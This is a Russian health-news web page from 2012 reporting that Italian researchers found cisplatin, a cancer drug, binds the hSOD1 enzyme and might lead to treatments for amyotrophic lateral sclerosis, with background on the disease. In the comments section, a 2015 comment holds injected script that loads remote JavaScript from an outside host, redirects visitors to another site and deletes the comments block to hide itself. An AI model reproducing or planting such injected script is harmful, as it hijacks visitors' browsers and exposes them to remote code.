Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Лекарство от рака против ...  >>  Лекарство от рака против паралича
 
Обратная связь
 

Лекарство от рака против паралича

Размер шрифта
17 июля 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Итальянские ученые обнаружили, что в скором времени на основе лекарства от рака можно будет создать новые препараты для лечения бокового амиотрофического склероза, который на данный момент является неизлечимым.

склероз

Что такое боковой амиотрофический склероз

Боковой амиотрофический склероз (БАС) – это прогрессирующее заболевание, которое характеризуется избирательный поражением двигательных нейронов спинного мозга и двигательных ядер ствола головного мозга. Заболевание проявляется неуклонно нарастающей слабостью в мышцах, мышечными атрофиями, быстрыми, неритмичными сокращениями некоторых участков мышц (фасцикуляции).

Наличие атрофий и фасцикуляций в мышцах языка, нарушение речи и глотания обычно ведет к более быстрому нарастанию симптоматики и летальному исходу. В конечностях преобладает слабость в мышцах кисти, которая нарастает и распространяется на мышцы предплечий, плечевого пояса и ног. В большинстве случаев наблюдается прогрессирование двигательных расстройств в течение 2–3 лет, которое заканчивается смертью.

На данный момент эффективного лечения заболевания не существует. Единственный препарат, который позволяет продлить жизнь пациентам на 2-4 месяца, – ингибитор высвобождения глутамата рилузол. Основу лечения составляет симптоматическая терапия, т.е. лечение, которое воздействует не на причину заболевания, а на отдельные симптомы.

Мнение ученых

Итальянские ученые поясняют, что БАС вызывает потерю контроля над мышцами, поскольку нервы, которые регулируют движения мышц, истощаются и погибают. Пациенты чувствуют слабость в руках и ногах, у них появляются проблемы с дыханием и глотанием и, в конечном итоге, большинство пациентов умирает через 3-5 лет после постановки диагноза.

Хотя в некоторых случаях БАС носит наследственный характер и передается из поколения в поколение, у подавляющего большинства пациентов (около 90%) причина заболевания неизвестна. Некоторые исследователи предполагают, что у данной категории пациентов развитие заболевания связано с антиоксидантным ферментом hSOD1.

Результаты исследования

В ходе исследования итальянские ученые пытались выяснить, оказывает ли цисплатин – препарат, который используется для лечения рака с 1960-х годов – какое-либо влияние на указанный фермент. Ранее было доказано, что цисплатин взаимодействует с некоторыми аминокислотами и ферментами.

Выполнив ряд лабораторных экспериментов, ученые обнаружили, что цисплатин быстро связывается с ферментом, препятствуя объединению его элементов и разрушая существующие связи. Ученые подчеркивают, что цисплатин не мешает нормальной работе фермента в организме.

Таким образом, на основе цисплатина можно будет создать эффективные препараты, которые помогут спасти жизнь многим пациентам.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что надо есть, чтобы не было паралича   Ботулотоксин против симптомов рассеянного склероза   Нейрофиброматоз II типа. Возвращение улыбки   Чем наесться, чтобы получить склероз?  
08 апреля 2013Что надо есть, чтобы не было паралича 16 июля 2012Забытое лекарство от рака против паралича!
 
20 августа 2012Ботулотоксин избавляет от склероза! 27 июля 2012Лица, перекошенные болезнью, вновь обретают улыбку!
 

Слайдшоу

1
5 симптомов, которые спасут вашу жизнь
Убийцы эрекции вашего мужа
Рассеянный склероз

Тесты

Нормальный ли у вас сон?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.